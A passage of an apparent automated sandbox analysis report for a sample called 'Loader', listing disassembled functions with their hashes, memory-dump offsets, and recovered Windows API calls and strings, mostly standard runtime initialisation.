                                                                                                                • Instruction Fuzzy Hash: DF516621705B418BC7258F39D9D03A7BFE39FA3204B5CDA9DC0D247B86C678A40B8B64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                                                • Instruction ID: e2272b09530fdfe434b0d143e6e3f29adb35b8dd9d30c8e57c0df37557f4ded1
                                                                                                                • Opcode Fuzzy Hash: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                                                • Instruction Fuzzy Hash: 10412A32B0827147CB188E2D8DA417BBAD39FC5205B0EC67AFCC9AB7D6D578990097D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e9c329e33e66690599fb787d261bd83ab39580b0a6d37eaf8bbef8854206921
                                                                                                                • Instruction ID: 20838f8c1eea955b373fb87a281ba7edf50170cdb8867ca150640271efdbbc58
                                                                                                                • Opcode Fuzzy Hash: 8e9c329e33e66690599fb787d261bd83ab39580b0a6d37eaf8bbef8854206921
                                                                                                                • Instruction Fuzzy Hash: 48416622745B418AC7258F39D9C13A7BFE39FA6204B5CDA9DC0D247B8AC678940B8B54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a812e7afcab0055418b5feebe48c17b33cb9248494f446b18543dda8bf1526a2
                                                                                                                • Instruction ID: b940f5766d675bc1515b45e8cb95eed982f6fe41c5deace55164cc72049bce6f
                                                                                                                • Opcode Fuzzy Hash: a812e7afcab0055418b5feebe48c17b33cb9248494f446b18543dda8bf1526a2
                                                                                                                • Instruction Fuzzy Hash: 702146356043089FD7009F54D882B7FB7AAE7CD718F14E53EEA8652360D7358C02979A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 02fb1f17ecc1b6475e96e4784a1cf3f539a3c4a72a17ab530f4db46c33cd6eae
                                                                                                                • Instruction ID: f1bbdd047a02e9e5c7edfc0c4259d1cfada5564dce6764716a5cab6588d50513
                                                                                                                • Opcode Fuzzy Hash: 02fb1f17ecc1b6475e96e4784a1cf3f539a3c4a72a17ab530f4db46c33cd6eae
                                                                                                                • Instruction Fuzzy Hash: D711E9646046938ADB118F369850373FFE1AFA3310F1CA59AD0D69B282D734C9428B59
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                • Instruction ID: 326f267f6e389890a46e85a813888d01e9b7a3303669f60e583d2f75ef0d29fd
                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                • Instruction Fuzzy Hash: 9B11EC337051D44EC31A8D3C85005A67FF30AD7234F19939AF5B49B2D2D5279D8B8369
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8be56e125ef8fdcd7b5aad0738f0f3c645e8bdf1225c287f9b8ea65b2d99b0bb
                                                                                                                • Instruction ID: 87ed21734994cec42363ea500dd018485c50acf6b9c8d804ad7c93d8f6aeac9f
                                                                                                                • Opcode Fuzzy Hash: 8be56e125ef8fdcd7b5aad0738f0f3c645e8bdf1225c287f9b8ea65b2d99b0bb
                                                                                                                • Instruction Fuzzy Hash: 0501D8F1B0071157D720DE11E4C0B2BB2A86F89708F09453EEC4957382DB7DEC09C299
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 785b39fcc9392fd8b71be73e1dc1e3a09604ef963da59a36aea491e73c3e0edd
                                                                                                                • Instruction ID: 76562f9a61f1b6c1c6b4a7ab71ee71120a88f630fed9c3b084894c0c6488cdb0
                                                                                                                • Opcode Fuzzy Hash: 785b39fcc9392fd8b71be73e1dc1e3a09604ef963da59a36aea491e73c3e0edd
                                                                                                                • Instruction Fuzzy Hash: 7F1108646146528ADB118F369C51273FFB2AF97310F1CE699D0969B392D734C8418B48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2444f6f41263fc9a97bc3a1e6faf490d7ee49476af38e0cea358b5169c090539
                                                                                                                • Instruction ID: bc08c9d27010f6511f84465c6cbe6ee7dff3e1f556fc70955d01d00546b88296
                                                                                                                • Opcode Fuzzy Hash: 2444f6f41263fc9a97bc3a1e6faf490d7ee49476af38e0cea358b5169c090539
                                                                                                                • Instruction Fuzzy Hash: C7E0862850C6828AC7158B29A5B0776FFA04B27245F5810AFC9D2A7382C735D806C768
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ac11a5084322e0e50038f3972ea835d5dbdd041ea50d3f791bc5976108fff5a
                                                                                                                • Instruction ID: 90dbf2188b88090532954ceb512ab571cc4c7e5e2bc879964961be4f991ac2d8
                                                                                                                • Opcode Fuzzy Hash: 8ac11a5084322e0e50038f3972ea835d5dbdd041ea50d3f791bc5976108fff5a
                                                                                                                • Instruction Fuzzy Hash: 58C092BCE481808F864CCF24D861879F3B0D713206B00312EF45373AA2D920E4019A0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12a41649df7de0182e420f360dc0e43a1c83710391c9b8b0ed4877af76609a86
                                                                                                                • Instruction ID: f0d1ac1899a3a52ad3df2ef200d9ce619c7cbc2c8289e8ec8468606478705e50
                                                                                                                • Opcode Fuzzy Hash: 12a41649df7de0182e420f360dc0e43a1c83710391c9b8b0ed4877af76609a86
                                                                                                                • Instruction Fuzzy Hash: 4DB092E9C02C10A7D4112B113E029AAB0240D1330CF05213AE84632243AA2AD21E409F
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString
                                                                                                                • String ID: $!$"$$$$$&$)$)$,$,$.$0$0$0$0$1$2$4$4$6$7$8$8$:$;$;$<$>
                                                                                                                • API String ID: 2525500382-3371045870
                                                                                                                • Opcode ID: 1840f16f3ed7a273a269ff92a96c2fada54146b50e64e1e0a7b3502e77a3b2fb
                                                                                                                • Instruction ID: 6906b77f927c0c7e426c2cc27663f2fd6647fa507eada89dfc8a2594fda36f35
                                                                                                                • Opcode Fuzzy Hash: 1840f16f3ed7a273a269ff92a96c2fada54146b50e64e1e0a7b3502e77a3b2fb
                                                                                                                • Instruction Fuzzy Hash: 8D81D32020D7D18AE332C73C885879BBED16BA7224F484B9ED1E99B2D2D7B50506C767
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID: $%$&$7$7$8$8$O$`$b$d$e$f$j
                                                                                                                • API String ID: 1927566239-1465853573
                                                                                                                • Opcode ID: c3dd1d8f25f4f9f6eb8a58d67c4bf423468c3cbcab7a7dddca57f637f2b7efce
                                                                                                                • Instruction ID: c9010006ce8fdacac2cbacb2e4c16478a99b051d9e320c3cd2a3323e0d169b55
                                                                                                                • Opcode Fuzzy Hash: c3dd1d8f25f4f9f6eb8a58d67c4bf423468c3cbcab7a7dddca57f637f2b7efce
                                                                                                                • Instruction Fuzzy Hash: 6941077110C7C18ED325DB28C85879BBFE1AB92314F084A9DE1E44B3D6C7BA8549C767
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit
                                                                                                                • String ID: B$F$K$N$i$o$s$x$y$z$}$~
                                                                                                                • API String ID: 2610073882-3505400394
                                                                                                                • Opcode ID: 3052f8970ba9629e4158c01bdb956601dbca793be04501bf74e504904e38b9f2
                                                                                                                • Instruction ID: 30ff3320af5e735e53faadba885bc6125f47e2871842261cc0130826748e476f
                                                                                                                • Opcode Fuzzy Hash: 3052f8970ba9629e4158c01bdb956601dbca793be04501bf74e504904e38b9f2
                                                                                                                • Instruction Fuzzy Hash: 6441293550C7C18ED325DB78884865EBFE16B92324F084B9DE0E5873E2D778950ACB57
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseFileHandleProcSize
                                                                                                                • String ID: CreateFileA
                                                                                                                • API String ID: 2836222988-1429953656
                                                                                                                • Opcode ID: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
                                                                                                                • Instruction ID: 07df4c49a6e64b5a2eed55e6ba22de401b5ac359ba41a96432ac09578365c069
                                                                                                                • Opcode Fuzzy Hash: 6237227718ce5fe0910a5e84a9b52ebe94880feaf232378b30d445bcc20ab736
                                                                                                                • Instruction Fuzzy Hash: 7941A4B0D082499FDB00EFA9D4987AEBBF0EF49314F04852DE899AB391D7749544CF92
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00CD6751,00000000,00000000,00000000,00000000), ref: 00CD6703
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                • Opcode ID: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
                                                                                                                • Instruction ID: b37d2abffe13f457b8cd396503f340c7f74600be9d9c66a2057b3f55231d799e
                                                                                                                • Opcode Fuzzy Hash: b4a804dc1340c5bf29362bb6abd50d21b3f14ceb7294178f68b9268adec2f03b
                                                                                                                • Instruction Fuzzy Hash: 8E210D36A01214A7C7319B66DC45B5E37B8DB417B4F150122FF15A7391EB30EE01D6E0
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF22D
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CCF23F
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF261
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
                                                                                                                • Instruction ID: 51fe5f837b2f135867c6f83b3ae652e277899cee35f8cb93577663868d64b91e
                                                                                                                • Opcode Fuzzy Hash: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
                                                                                                                • Instruction Fuzzy Hash: CE01A235940699AFDB119B54DC49FAEBBB9FB04B55F040639F821A62D0DB749900CA80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7ca64bab4b3ac8d90eed5d5300d1ffe76d2d69cc22fbe1bc8cf594d2e6b99d49
                                                                                                                • Instruction ID: 0c42690a5293a3ac0271bf4a51ba46008a5e67c5c317d6596c9e33a8351006d6
                                                                                                                • Opcode Fuzzy Hash: 7ca64bab4b3ac8d90eed5d5300d1ffe76d2d69cc22fbe1bc8cf594d2e6b99d49
                                                                                                                • Instruction Fuzzy Hash: 78B11371A042C9AFDB11DFAAC885BBEBBB1BF45310F144159E9259B392C770AF41CB60
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: FreeConsole$kernel32.dll
                                                                                                                • API String ID: 1646373207-2564406000
                                                                                                                • Opcode ID: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
                                                                                                                • Instruction ID: 31b758787dead4bbb77bf84c1d3ab0062769d49b75bff57ce21389132b9ea46d
                                                                                                                • Opcode Fuzzy Hash: fbf3160ece114f23fb85a298d1a2b9de3ebb701aa0e1935167f5873a53caf2f6
                                                                                                                • Instruction Fuzzy Hash: 990166749042489FCB40EFB8D98579DBBF4AB48300F41856AE849DB351EB34A654DF82
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC), ref: 00CDF6BD
                                                                                                                • GetLastError.KERNEL32(?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC,00000000,?,00CD539C), ref: 00CDF6C7
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CDF6EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                • Opcode ID: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
                                                                                                                • Instruction ID: a6e6a6bdbff0a587afffd36758e777df52815c18fd78f530e4cd1be447f1fecf
                                                                                                                • Opcode Fuzzy Hash: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
                                                                                                                • Instruction Fuzzy Hash: 4FE04831250245B7FB201B61EC4AF5C3BD5EF00B94F240031FB0DA85F1DBA2DA52A584
                                                                                                                APIs
                                                                                                                • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00CDD7B1
                                                                                                                  • Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CDDA03
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CDDA49
                                                                                                                • GetLastError.KERNEL32 ref: 00CDDAEC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 2112829910-0
                                                                                                                • Opcode ID: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
                                                                                                                • Instruction ID: 3f1b8f3fc431f1d241885f0922b159d14a88d26990f25db49c429096bb3fda57
                                                                                                                • Opcode Fuzzy Hash: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
                                                                                                                • Instruction Fuzzy Hash: 0BD16B75D042499FCF15CFA8D880AEDBBB9FF08314F28816AE56AEB351D730A941DB50
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00CDC976
                                                                                                                  • Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9AE
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 158306478-0
                                                                                                                • Opcode ID: 1bdc21112c7581d4e6c1718951d195e8f34b21c17eda9cdae0f1c6555959edcb
                                                                                                                • Instruction ID: 44a74750a3d50ddadf136801311ad7195afc80b53598e95685e62a35dbe60c8e
                                                                                                                • Opcode Fuzzy Hash: 1bdc21112c7581d4e6c1718951d195e8f34b21c17eda9cdae0f1c6555959edcb
                                                                                                                • Instruction Fuzzy Hash: 0911EDF2901A4B7FA72167BA5CC9D7F69ACDE843E43100027FA09A1344EE21CE01B5B0
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CCA347
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CCA356
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00CCA35F
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00CCA36C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
